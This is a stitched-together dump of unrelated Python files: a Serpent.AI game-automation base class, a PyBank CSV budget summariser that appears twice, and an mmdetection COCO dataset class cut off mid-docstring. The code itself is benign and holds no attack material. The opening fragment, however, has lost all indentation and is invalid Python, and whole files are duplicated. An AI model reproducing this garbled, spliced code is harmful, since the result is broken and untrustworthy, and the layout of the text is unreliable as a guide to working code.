self.window_geometry = self.extract_window_geometry()
print(self.window_geometry)
def play(self, game_agent_class_name="GameAgent", frame_handler=None, **kwargs):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
game_agent_class = offshoot.discover("GameAgent", selection=game_agent_class_name).get(game_agent_class_name, GameAgent)
if game_agent_class is None:
raise GameError("The provided Game Agent class name does not map to an existing class...")
game_agent = game_agent_class(
game=self,
input_controller=InputController(game=self, backend=self.input_controller),
**kwargs
)
# Look if we need to auto-append PNG to frame transformation pipeline based on given frame_handler
png_frame_handlers = ["RECORD"]
if frame_handler in png_frame_handlers and self.frame_transformation_pipeline_string is not None:
if not self.frame_transformation_pipeline_string.endswith("|PNG"):
self.frame_transformation_pipeline_string += "|PNG"
self.start_frame_grabber()
self.redis_client.delete(config["frame_grabber"]["redis_key"])
while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
time.sleep(0.1)
self.window_controller.focus_window(self.window_id)
# Override FPS Config?
if frame_handler == "RECORD":
self.game_frame_limiter = GameFrameLimiter(fps=10)
try:
while True:
self.game_frame_limiter.start()
game_frame, game_frame_pipeline = self.grab_latest_frame()
try:
if self.is_focused:
self.pause_callback_fired = False
game_agent.on_game_frame(game_frame, game_frame_pipeline, frame_handler=frame_handler, **kwargs)
else:
if not self.pause_callback_fired:
print("PAUSED\n")
game_agent.on_pause(frame_handler=frame_handler, **kwargs)
self.pause_callback_fired = True
time.sleep(1)
except Exception as e:
raise e
# print(e)
# time.sleep(0.1)
self.game_frame_limiter.stop_and_delay()
except Exception as e:
print(e)
finally:
self.stop_frame_grabber()
@offshoot.forbidden
def extract_window_geometry(self):
if self.is_launched:
return self.window_controller.get_window_geometry(self.window_id)
return None
@offshoot.forbidden
def start_frame_grabber(self, pipeline_string=None):
if not self.is_launched:
raise GameError(f"Game '{self.__class__.__name__}' is not running...")
if self.frame_grabber_process is not None:
self.stop_frame_grabber()
frame_grabber_command = f"serpent grab_frames {self.window_geometry["width"]} {self.window_geometry["height"]} {self.window_geometry["x_offset"]} {self.window_geometry["y_offset"]}"
pipeline_string = pipeline_string or self.frame_transformation_pipeline_string
if pipeline_string is not None:
frame_grabber_command += f" {pipeline_string}"
self.frame_grabber_process = subprocess.Popen(shlex.split(frame_grabber_command))
signal.signal(signal.SIGINT, self._handle_signal)
signal.signal(signal.SIGTERM, self._handle_signal)
atexit.register(self._handle_signal, 15, None, False)
@offshoot.forbidden
def stop_frame_grabber(self):
if self.frame_grabber_process is None:
return None
self.frame_grabber_process.kill()
self.frame_grabber_process = None
atexit.unregister(self._handle_signal)
@offshoot.forbidden
def grab_latest_frame(self):
game_frame_buffer, game_frame_buffer_pipeline = FrameGrabber.get_frames_with_pipeline([0])
return game_frame_buffer.frames[0], game_frame_buffer_pipeline.frames[0]
def _discover_sprites(self):
plugin_path = offshoot.config["file_paths"]["plugins"]
sprites = dict()
sprite_path = f"{plugin_path}/{self.__class__.__name__}Plugin/files/data/sprites"
if os.path.isdir(sprite_path):
files = os.scandir(sprite_path)
for file in files:
if file.name.endswith(".png"):
sprite_name = "_".join(file.name.split("/")[-1].split("_")[:-1]).replace(".png", "").upper()
sprite_image_data = skimage.io.imread(f"{sprite_path}/{file.name}")
sprite_image_data = sprite_image_data[..., np.newaxis]
if sprite_name not in sprites:
sprite = Sprite(sprite_name, image_data=sprite_image_data)
sprites[sprite_name] = sprite
else:
sprites[sprite_name].append_image_data(sprite_image_data)
return sprites
def _handle_signal(self, signum=15, frame=None, do_exit=True):
if self.frame_grabber_process is not None:
if self.frame_grabber_process.poll() is None:
self.frame_grabber_process.send_signal(signum)
if do_exit:
exit()
| import warnings
warnings.simplefilter("ignore")
import offshoot
import subprocess
import signal
import shlex
import time
import os, os.path
import atexit
from serpent.game_agent import GameAgent
from serpent.game_launchers import *
from serpent.window_controller import WindowController
from serpent.input_controller import InputController, InputControllers
from serpent.frame_grabber import FrameGrabber
from serpent.game_frame_limiter import GameFrameLimiter
from serpent.sprite import Sprite
from serpent.utilities import clear_terminal, is_windows, SerpentError
import skimage.io
import skimage.color
import numpy as np
from redis import StrictRedis
from serpent.config import config
class GameError(BaseException):
pass
class Game(offshoot.Pluggable):
    """Base class for Serpent.AI game plugins.

    Wraps window discovery and management, frame grabbing, sprite loading
    and the agent play loop for a concrete game plugin subclass.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

        # Plugin-specific configuration section, e.g. "SerpentMyGamePlugin".
        self.config = config.get(f"{self.__class__.__name__}Plugin", dict())

        self.platform = kwargs.get("platform")

        # Pick the input backend appropriate for the host OS unless overridden.
        default_input_controller_backend = InputControllers.NATIVE_WIN32 if is_windows() else InputControllers.PYAUTOGUI
        self.input_controller = kwargs.get("input_controller") or default_input_controller_backend

        self.window_id = None
        self.window_name = kwargs.get("window_name")
        self.window_geometry = None
        self.dashboard_window_id = None
        self.window_controller = WindowController()

        self.is_launched = False

        self.frame_grabber_process = None
        self.frame_transformation_pipeline_string = None

        self.game_frame_limiter = GameFrameLimiter(fps=self.config.get("fps", 30))

        self.api_class = None
        self.api_instance = None

        self.environments = dict()
        self.environment_data = dict()

        self.sprites = self._discover_sprites()

        self.redis_client = StrictRedis(**config["redis"])

        self.pause_callback_fired = False

        self.kwargs = kwargs

    @property
    @offshoot.forbidden
    def game_name(self):
        """Plugin class name with the 'Serpent'/'Game' affixes stripped."""
        return self.__class__.__name__.replace("Serpent", "").replace("Game", "")

    @property
    @offshoot.forbidden
    def game_launcher(self):
        """Launcher class for the configured platform, or None if unknown."""
        return self.game_launchers.get(self.platform)

    @property
    @offshoot.forbidden
    def game_launchers(self):
        """Mapping of supported platform identifiers to launcher classes."""
        return {
            "steam": SteamGameLauncher,
            "executable": ExecutableGameLauncher,
            "web_browser": WebBrowserGameLauncher,
            "retroarch": RetroarchGameLauncher
        }

    @property
    @offshoot.expected
    def screen_regions(self):
        """Named screen regions; must be supplied by the plugin subclass."""
        raise NotImplementedError()

    @property
    @offshoot.forbidden
    def api(self):
        """Lazily-instantiated game API singleton.

        BUGFIX: the first access previously returned None because the freshly
        created instance was only returned from the ``else`` branch on
        subsequent accesses.
        """
        if self.api_instance is None:
            self.api_instance = self.api_class(game=self)

        return self.api_instance

    @property
    @offshoot.forbidden
    def is_focused(self):
        """True when the game window currently has input focus."""
        return self.window_controller.is_window_focused(self.window_id)

    @offshoot.forbidden
    def launch(self, dry_run=False):
        """Launch the game (skipped when *dry_run*) and run the launch hooks."""
        self.before_launch()

        if not dry_run:
            self.game_launcher().launch(**self.kwargs)

        self.after_launch()

    @offshoot.forbidden
    def relaunch(self, before_relaunch=None, after_relaunch=None):
        """Restart the game and the frame grabber, invoking optional hooks.

        Args:
            before_relaunch: Optional callable invoked before relaunching.
            after_relaunch: Optional callable invoked once frames are flowing.
        """
        clear_terminal()
        print("")
        print("Relaunching the game...")

        self.stop_frame_grabber()

        time.sleep(1)

        if before_relaunch is not None:
            before_relaunch()

        time.sleep(1)

        subprocess.call(shlex.split(f"serpent launch {self.game_name}"))
        self.launch(dry_run=True)

        self.start_frame_grabber()
        self.redis_client.delete(config["frame_grabber"]["redis_key"])

        # Block until the grabber has published its first frame to Redis.
        while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
            time.sleep(0.1)

        self.window_controller.focus_window(self.window_id)

        if after_relaunch is not None:
            after_relaunch()

    def before_launch(self):
        """Hook called immediately before the game is launched."""
        pass

    def after_launch(self):
        """Locate and position the game window once the game is running.

        Raises:
            SerpentError: If the game window cannot be found within ~10s.
        """
        self.is_launched = True

        # Poll for the game window for up to 100 attempts (~10 seconds).
        current_attempt = 1

        while current_attempt <= 100:
            self.window_id = self.window_controller.locate_window(self.window_name)

            if self.window_id not in [0, "0"]:
                break

            # BUGFIX: the counter was never incremented, so a missing window
            # made this loop spin forever and the SerpentError below was
            # unreachable.
            current_attempt += 1
            time.sleep(0.1)

        time.sleep(3)

        if self.window_id in [0, "0"]:
            raise SerpentError("Game window not found...")

        self.window_controller.move_window(self.window_id, 0, 0)

        self.dashboard_window_id = self.window_controller.locate_window("Serpent.AI Dashboard")

        # TODO: Test on macOS and Linux
        if self.dashboard_window_id is not None and self.dashboard_window_id not in [0, "0"]:
            self.window_controller.bring_window_to_top(self.dashboard_window_id)

        self.window_controller.focus_window(self.window_id)

        self.window_geometry = self.extract_window_geometry()

        print(self.window_geometry)

    def play(self, game_agent_class_name="GameAgent", frame_handler=None, **kwargs):
        """Run the main agent loop against the live game.

        Args:
            game_agent_class_name: Name of the GameAgent plugin class to use.
            frame_handler: Optional frame handler name forwarded to the agent.
            **kwargs: Extra keyword arguments passed through to the agent.

        Raises:
            GameError: If the game is not running or no agent class resolves.
        """
        if not self.is_launched:
            raise GameError(f"Game '{self.__class__.__name__}' is not running...")

        # Falls back to the base GameAgent when discovery finds no match.
        game_agent_class = offshoot.discover("GameAgent", selection=game_agent_class_name).get(game_agent_class_name, GameAgent)

        if game_agent_class is None:
            raise GameError("The provided Game Agent class name does not map to an existing class...")

        game_agent = game_agent_class(
            game=self,
            input_controller=InputController(game=self, backend=self.input_controller),
            **kwargs
        )

        # Look if we need to auto-append PNG to frame transformation pipeline based on given frame_handler
        png_frame_handlers = ["RECORD"]

        if frame_handler in png_frame_handlers and self.frame_transformation_pipeline_string is not None:
            if not self.frame_transformation_pipeline_string.endswith("|PNG"):
                self.frame_transformation_pipeline_string += "|PNG"

        self.start_frame_grabber()
        self.redis_client.delete(config["frame_grabber"]["redis_key"])

        # Wait for the first captured frame before focusing the window.
        while self.redis_client.llen(config["frame_grabber"]["redis_key"]) == 0:
            time.sleep(0.1)

        self.window_controller.focus_window(self.window_id)

        # Override FPS Config?
        if frame_handler == "RECORD":
            self.game_frame_limiter = GameFrameLimiter(fps=10)

        try:
            while True:
                self.game_frame_limiter.start()

                game_frame, game_frame_pipeline = self.grab_latest_frame()

                try:
                    if self.is_focused:
                        self.pause_callback_fired = False
                        game_agent.on_game_frame(game_frame, game_frame_pipeline, frame_handler=frame_handler, **kwargs)
                    else:
                        if not self.pause_callback_fired:
                            print("PAUSED\n")
                            game_agent.on_pause(frame_handler=frame_handler, **kwargs)
                            self.pause_callback_fired = True

                        time.sleep(1)
                except Exception as e:
                    # Debugging scaffold: swap the re-raise for the prints
                    # below to keep playing through agent errors.
                    raise e
                    # print(e)
                    # time.sleep(0.1)

                self.game_frame_limiter.stop_and_delay()
        except Exception as e:
            print(e)
        finally:
            self.stop_frame_grabber()

    @offshoot.forbidden
    def extract_window_geometry(self):
        """Return the window geometry dict, or None when not launched."""
        if self.is_launched:
            return self.window_controller.get_window_geometry(self.window_id)

        return None

    @offshoot.forbidden
    def start_frame_grabber(self, pipeline_string=None):
        """Spawn the 'serpent grab_frames' subprocess for this window.

        Args:
            pipeline_string: Optional frame transformation pipeline override;
                defaults to ``self.frame_transformation_pipeline_string``.

        Raises:
            GameError: If the game is not running.
        """
        if not self.is_launched:
            raise GameError(f"Game '{self.__class__.__name__}' is not running...")

        if self.frame_grabber_process is not None:
            self.stop_frame_grabber()

        frame_grabber_command = f"serpent grab_frames {self.window_geometry['width']} {self.window_geometry['height']} {self.window_geometry['x_offset']} {self.window_geometry['y_offset']}"

        pipeline_string = pipeline_string or self.frame_transformation_pipeline_string

        if pipeline_string is not None:
            frame_grabber_command += f" {pipeline_string}"

        self.frame_grabber_process = subprocess.Popen(shlex.split(frame_grabber_command))

        # Ensure the grabber subprocess is torn down when we are.
        signal.signal(signal.SIGINT, self._handle_signal)
        signal.signal(signal.SIGTERM, self._handle_signal)

        atexit.register(self._handle_signal, 15, None, False)

    @offshoot.forbidden
    def stop_frame_grabber(self):
        """Kill the frame grabber subprocess if one is running."""
        if self.frame_grabber_process is None:
            return None

        self.frame_grabber_process.kill()
        self.frame_grabber_process = None

        atexit.unregister(self._handle_signal)

    @offshoot.forbidden
    def grab_latest_frame(self):
        """Return ``(raw_frame, pipeline_frame)`` for the most recent capture."""
        game_frame_buffer, game_frame_buffer_pipeline = FrameGrabber.get_frames_with_pipeline([0])

        return game_frame_buffer.frames[0], game_frame_buffer_pipeline.frames[0]

    def _discover_sprites(self):
        """Load sprite PNGs from the plugin's ``files/data/sprites`` directory.

        Returns:
            dict: Sprite name (upper-cased, index suffix stripped) -> Sprite.
        """
        plugin_path = offshoot.config["file_paths"]["plugins"]

        sprites = dict()
        sprite_path = f"{plugin_path}/{self.__class__.__name__}Plugin/files/data/sprites"

        if os.path.isdir(sprite_path):
            files = os.scandir(sprite_path)

            for file in files:
                if file.name.endswith(".png"):
                    # "SPRITE_NAME_0.png" -> "SPRITE_NAME" (trailing index dropped).
                    sprite_name = "_".join(file.name.split("/")[-1].split("_")[:-1]).replace(".png", "").upper()

                    sprite_image_data = skimage.io.imread(f"{sprite_path}/{file.name}")
                    sprite_image_data = sprite_image_data[..., np.newaxis]

                    if sprite_name not in sprites:
                        sprite = Sprite(sprite_name, image_data=sprite_image_data)
                        sprites[sprite_name] = sprite
                    else:
                        # Additional files with the same stem become extra
                        # image frames for the existing sprite.
                        sprites[sprite_name].append_image_data(sprite_image_data)

        return sprites

    def _handle_signal(self, signum=15, frame=None, do_exit=True):
        """Forward *signum* to the frame grabber subprocess, then optionally exit.

        Registered both as a signal handler and as an atexit callback
        (with ``do_exit=False`` to avoid re-entering ``exit()``).
        """
        if self.frame_grabber_process is not None:
            if self.frame_grabber_process.poll() is None:
                self.frame_grabber_process.send_signal(signum)

                if do_exit:
                    exit()
|
#PyBank: summarize monthly budget data (month count, net total, average
#profit change, greatest single-month increase/decrease).
#imports
import pathlib
import csv

#input/output paths
input_path = pathlib.Path("Resources/budget_data.csv")
output_path = pathlib.Path("Analysis/results.txt")

#make dictionary for result values
result_values = {
    "total_months": 0,
    "total": 0,
    "average_change": None,
    "greatest_increase_in_profits": 0,
    "greatest_decrease_in_profits": 0,
}

#helper vars
prev_profit = None
total_profit_change = 0
greatest_increase_month = ""
greatest_decrease_month = ""

#open input file
with open(input_path, 'r') as budget_file:
    #create reader cursor and skip the header
    reader_cursor = csv.reader(budget_file, delimiter=',')
    header = next(reader_cursor)

    profit_change = 0

    for row in reader_cursor:
        #count each month
        result_values["total_months"] += 1

        #calculate change in profit
        current_profit = int(row[1])

        #if prev_profit has been recorded (identity check, not `!= None`)
        if prev_profit is not None:
            profit_change = current_profit - prev_profit
            total_profit_change += profit_change

        #record prev_profit for next loop
        prev_profit = current_profit

        #add money to total
        result_values["total"] += current_profit

        #update greatest/least change in profit
        if result_values["greatest_increase_in_profits"] < profit_change:
            result_values["greatest_increase_in_profits"] = profit_change
            greatest_increase_month = row[0]
        if result_values["greatest_decrease_in_profits"] > profit_change:
            result_values["greatest_decrease_in_profits"] = profit_change
            greatest_decrease_month = row[0]

#calculate average change in profit; guard against ZeroDivisionError when
#the file has fewer than two data rows (no month-to-month change exists)
if result_values["total_months"] > 1:
    result_values["average_change"] = round(total_profit_change / (result_values["total_months"] - 1), 2)
else:
    result_values["average_change"] = 0

#result in lines
#BUGFIX: these f-strings previously nested single quotes inside
#single-quoted literals, a SyntaxError on Python < 3.12 (PEP 701)
result_lines = [
    "Financial Analysis",
    "-------------------------",
    f'Total Months: {result_values["total_months"]}',
    f'Total: ${result_values["total"]}',
    f'Average Change: ${result_values["average_change"]}',
    f'Greatest Increase in Profits: {greatest_increase_month} ${result_values["greatest_increase_in_profits"]}',
    f'Greatest Decrease in Profits: {greatest_decrease_month} ${result_values["greatest_decrease_in_profits"]}',
]

#print results to terminal
for result in result_lines:
    print(result)

# write results to file (context manager guarantees the handle is closed)
with open(output_path, 'w') as result_file:
    for line in result_lines:
        result_file.write(line)
        result_file.write('\n')
#PyBank: summarize monthly budget data (month count, net total, average
#profit change, greatest single-month increase/decrease).
#imports
import pathlib
import csv

#input/output paths
input_path = pathlib.Path("Resources/budget_data.csv")
output_path = pathlib.Path("Analysis/results.txt")

#make dictionary for result values
result_values = {
    "total_months": 0,
    "total": 0,
    "average_change": None,
    "greatest_increase_in_profits": 0,
    "greatest_decrease_in_profits": 0,
}

#helper vars
prev_profit = None
total_profit_change = 0
greatest_increase_month = ""
greatest_decrease_month = ""

#open input file
with open(input_path, 'r') as budget_file:
    #create reader cursor and skip the header
    reader_cursor = csv.reader(budget_file, delimiter=',')
    header = next(reader_cursor)

    profit_change = 0

    for row in reader_cursor:
        #count each month
        result_values["total_months"] += 1

        #calculate change in profit
        current_profit = int(row[1])

        #if prev_profit has been recorded (identity check, not `!= None`)
        if prev_profit is not None:
            profit_change = current_profit - prev_profit
            total_profit_change += profit_change

        #record prev_profit for next loop
        prev_profit = current_profit

        #add money to total
        result_values["total"] += current_profit

        #update greatest/least change in profit
        if result_values["greatest_increase_in_profits"] < profit_change:
            result_values["greatest_increase_in_profits"] = profit_change
            greatest_increase_month = row[0]
        if result_values["greatest_decrease_in_profits"] > profit_change:
            result_values["greatest_decrease_in_profits"] = profit_change
            greatest_decrease_month = row[0]

#calculate average change in profit; guard against ZeroDivisionError when
#the file has fewer than two data rows (no month-to-month change exists)
if result_values["total_months"] > 1:
    result_values["average_change"] = round(total_profit_change / (result_values["total_months"] - 1), 2)
else:
    result_values["average_change"] = 0

#result in lines
result_lines = [
    "Financial Analysis",
    "-------------------------",
    f'Total Months: {result_values["total_months"]}',
    f'Total: ${result_values["total"]}',
    f'Average Change: ${result_values["average_change"]}',
    f'Greatest Increase in Profits: {greatest_increase_month} ${result_values["greatest_increase_in_profits"]}',
    f'Greatest Decrease in Profits: {greatest_decrease_month} ${result_values["greatest_decrease_in_profits"]}',
]

#print results to terminal
for result in result_lines:
    print(result)

# write results to file (context manager guarantees the handle is closed)
with open(output_path, 'w') as result_file:
    for line in result_lines:
        result_file.write(line)
        result_file.write('\n')
|
# Copyright (c) OpenMMLab. All rights reserved.
import itertools
import logging
import os.path as osp
import tempfile
import warnings
from collections import OrderedDict
import mmcv
import numpy as np
from mmcv.utils import print_log
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .api_wrappers import COCO, COCOeval
from .builder import DATASETS
from .custom import CustomDataset
from .usbeval import USBeval
@DATASETS.register_module()
class CocoDataset(CustomDataset):
    """COCO-style detection dataset.

    Extends mmdet's CustomDataset with COCO annotation loading, json result
    dumping, and evaluation via USBeval (scale-wise AP metrics).
    """

    CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
               'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
               'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
               'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
               'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
               'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
               'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
               'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
               'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
               'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
               'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
               'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
               'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
               'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')

    def load_annotations(self, ann_file):
        """Load annotation from COCO style annotation file.

        Args:
            ann_file (str): Path of annotation file.

        Returns:
            list[dict]: Annotation info from COCO api.
        """
        self.coco = COCO(ann_file)
        # The order of returned `cat_ids` will not
        # change with the order of the CLASSES
        self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
        self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
        self.img_ids = self.coco.get_img_ids()
        data_infos = []
        total_ann_ids = []
        for i in self.img_ids:
            info = self.coco.load_imgs([i])[0]
            info['filename'] = info['file_name']
            data_infos.append(info)
            ann_ids = self.coco.get_ann_ids(img_ids=[i])
            total_ann_ids.extend(ann_ids)
        assert len(set(total_ann_ids)) == len(
            total_ann_ids), f"Annotation ids in '{ann_file}' are not unique!"
        return data_infos

    def get_ann_info(self, idx):
        """Get COCO annotation by index.

        Args:
            idx (int): Index of data.

        Returns:
            dict: Annotation info of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return self._parse_ann_info(self.data_infos[idx], ann_info)

    def get_cat_ids(self, idx):
        """Get COCO category ids by index.

        Args:
            idx (int): Index of data.

        Returns:
            list[int]: All categories in the image of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return [ann['category_id'] for ann in ann_info]

    def _filter_imgs(self, min_size=32):
        """Filter images too small or without ground truths."""
        valid_inds = []
        # obtain images that contain annotation
        ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
        # obtain images that contain annotations of the required categories
        ids_in_cat = set()
        for i, class_id in enumerate(self.cat_ids):
            ids_in_cat |= set(self.coco.cat_img_map[class_id])
        # merge the image id sets of the two conditions and use the merged set
        # to filter out images if self.filter_empty_gt=True
        ids_in_cat &= ids_with_ann

        valid_img_ids = []
        for i, img_info in enumerate(self.data_infos):
            img_id = self.img_ids[i]
            if self.filter_empty_gt and img_id not in ids_in_cat:
                continue
            if min(img_info['width'], img_info['height']) >= min_size:
                valid_inds.append(i)
                valid_img_ids.append(img_id)
        self.img_ids = valid_img_ids
        return valid_inds

    def _parse_ann_info(self, img_info, ann_info):
        """Parse bbox and mask annotation.

        Args:
            img_info (dict): Image info (width/height/filename) of the image.
            ann_info (list[dict]): Annotation info of an image.

        Returns:
            dict: A dict containing the following keys: bboxes, bboxes_ignore,\
                labels, masks, seg_map. "masks" are raw annotations and not \
                decoded into binary masks.
        """
        gt_bboxes = []
        gt_labels = []
        gt_bboxes_ignore = []
        gt_masks_ann = []
        for i, ann in enumerate(ann_info):
            if ann.get('ignore', False):
                continue
            x1, y1, w, h = ann['bbox']
            # Clip the box against the image and drop boxes fully outside it.
            inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
            inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
            if inter_w * inter_h == 0:
                continue
            if ann['area'] <= 0 or w < 1 or h < 1:
                continue
            if ann['category_id'] not in self.cat_ids:
                continue
            bbox = [x1, y1, x1 + w, y1 + h]
            if ann.get('iscrowd', False):
                # Crowd regions are ignored rather than used as positives.
                gt_bboxes_ignore.append(bbox)
            else:
                gt_bboxes.append(bbox)
                gt_labels.append(self.cat2label[ann['category_id']])
                gt_masks_ann.append(ann.get('segmentation', None))

        if gt_bboxes:
            gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
            gt_labels = np.array(gt_labels, dtype=np.int64)
        else:
            gt_bboxes = np.zeros((0, 4), dtype=np.float32)
            gt_labels = np.array([], dtype=np.int64)

        if gt_bboxes_ignore:
            gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
        else:
            gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)

        # NOTE: str.replace substitutes the first 'jpg' anywhere in the name,
        # not just the extension — kept for compatibility with mmdet upstream.
        seg_map = img_info['filename'].replace('jpg', 'png')

        ann = dict(
            bboxes=gt_bboxes,
            labels=gt_labels,
            bboxes_ignore=gt_bboxes_ignore,
            masks=gt_masks_ann,
            seg_map=seg_map)

        return ann

    def xyxy2xywh(self, bbox):
        """Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
        evaluation.

        Args:
            bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
                ``xyxy`` order.

        Returns:
            list[float]: The converted bounding boxes, in ``xywh`` order.
        """
        _bbox = bbox.tolist()
        return [
            _bbox[0],
            _bbox[1],
            _bbox[2] - _bbox[0],
            _bbox[3] - _bbox[1],
        ]

    def _proposal2json(self, results):
        """Convert proposal results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            bboxes = results[idx]
            for i in range(bboxes.shape[0]):
                data = dict()
                data['image_id'] = img_id
                data['bbox'] = self.xyxy2xywh(bboxes[i])
                data['score'] = float(bboxes[i][4])
                # Proposals are class-agnostic; category id 1 is a placeholder.
                data['category_id'] = 1
                json_results.append(data)
        return json_results

    def _det2json(self, results):
        """Convert detection results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            result = results[idx]
            for label in range(len(result)):
                bboxes = result[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    json_results.append(data)
        return json_results

    def _segm2json(self, results):
        """Convert instance segmentation results to COCO json style."""
        bbox_json_results = []
        segm_json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            det, seg = results[idx]
            for label in range(len(det)):
                # bbox results
                bboxes = det[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    bbox_json_results.append(data)

                # segm results
                # some detectors use different scores for bbox and mask
                if isinstance(seg, tuple):
                    segms = seg[0][label]
                    mask_score = seg[1][label]
                else:
                    segms = seg[label]
                    mask_score = [bbox[4] for bbox in bboxes]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(mask_score[i])
                    data['category_id'] = self.cat_ids[label]
                    if isinstance(segms[i]['counts'], bytes):
                        # RLE counts must be str for json serialization.
                        segms[i]['counts'] = segms[i]['counts'].decode()
                    data['segmentation'] = segms[i]
                    segm_json_results.append(data)
        return bbox_json_results, segm_json_results

    def results2json(self, results, outfile_prefix):
        """Dump the detection results to a COCO style json file.

        There are 3 types of results: proposals, bbox predictions, mask
        predictions, and they have different data types. This method will
        automatically recognize the type, and dump them to json files.

        Args:
            results (list[list | tuple | ndarray]): Testing results of the
                dataset.
            outfile_prefix (str): The filename prefix of the json files. If the
                prefix is "somepath/xxx", the json files will be named
                "somepath/xxx.bbox.json", "somepath/xxx.segm.json",
                "somepath/xxx.proposal.json".

        Returns:
            dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
                values are corresponding filenames.
        """
        result_files = dict()
        if isinstance(results[0], list):
            json_results = self._det2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            mmcv.dump(json_results, result_files['bbox'])
        elif isinstance(results[0], tuple):
            json_results = self._segm2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            result_files['segm'] = f'{outfile_prefix}.segm.json'
            mmcv.dump(json_results[0], result_files['bbox'])
            mmcv.dump(json_results[1], result_files['segm'])
        elif isinstance(results[0], np.ndarray):
            json_results = self._proposal2json(results)
            result_files['proposal'] = f'{outfile_prefix}.proposal.json'
            mmcv.dump(json_results, result_files['proposal'])
        else:
            raise TypeError('invalid type of results')
        return result_files

    def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
        """Compute average recall of proposals directly, without COCOeval.

        Args:
            results (list[ndarray]): Proposal boxes per image.
            proposal_nums (Sequence[int]): Proposal numbers to evaluate.
            iou_thrs (Sequence[float]): IoU thresholds.
            logger (logging.Logger | str | None): Logger for printing.

        Returns:
            ndarray: Average recall per proposal number.
        """
        gt_bboxes = []
        for i in range(len(self.img_ids)):
            ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
            ann_info = self.coco.load_anns(ann_ids)
            if len(ann_info) == 0:
                gt_bboxes.append(np.zeros((0, 4)))
                continue
            bboxes = []
            for ann in ann_info:
                if ann.get('ignore', False) or ann['iscrowd']:
                    continue
                x1, y1, w, h = ann['bbox']
                bboxes.append([x1, y1, x1 + w, y1 + h])
            bboxes = np.array(bboxes, dtype=np.float32)
            if bboxes.shape[0] == 0:
                bboxes = np.zeros((0, 4))
            gt_bboxes.append(bboxes)

        recalls = eval_recalls(
            gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
        ar = recalls.mean(axis=1)
        return ar

    def format_results(self, results, jsonfile_prefix=None, **kwargs):
        """Format the results to json (standard format for COCO evaluation).

        Args:
            results (list[tuple | numpy.ndarray]): Testing results of the
                dataset.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.

        Returns:
            tuple: (result_files, tmp_dir), result_files is a dict containing \
                the json filepaths, tmp_dir is the temporal directory created \
                for saving json files when jsonfile_prefix is not specified.
        """
        assert isinstance(results, list), 'results must be a list'
        assert len(results) == len(self), (
            'The length of results is not equal to the dataset len: {} != {}'.
            format(len(results), len(self)))

        if jsonfile_prefix is None:
            tmp_dir = tempfile.TemporaryDirectory()
            jsonfile_prefix = osp.join(tmp_dir.name, 'results')
        else:
            tmp_dir = None
        result_files = self.results2json(results, jsonfile_prefix)
        return result_files, tmp_dir

    def evaluate(self,
                 results,
                 metric='bbox',
                 logger=None,
                 jsonfile_prefix=None,
                 classwise=True,
                 proposal_nums=(1, 10, 100),
                 iou_thrs=None,
                 usb_eval=True,
                 area_range_type='absolute_scale_ap'):
        """Evaluation in COCO protocol.

        Args:
            results (list[list | tuple]): Testing results of the dataset.
            metric (str | list[str]): Metrics to be evaluated. Options are
                'bbox', 'segm', 'proposal', 'proposal_fast'.
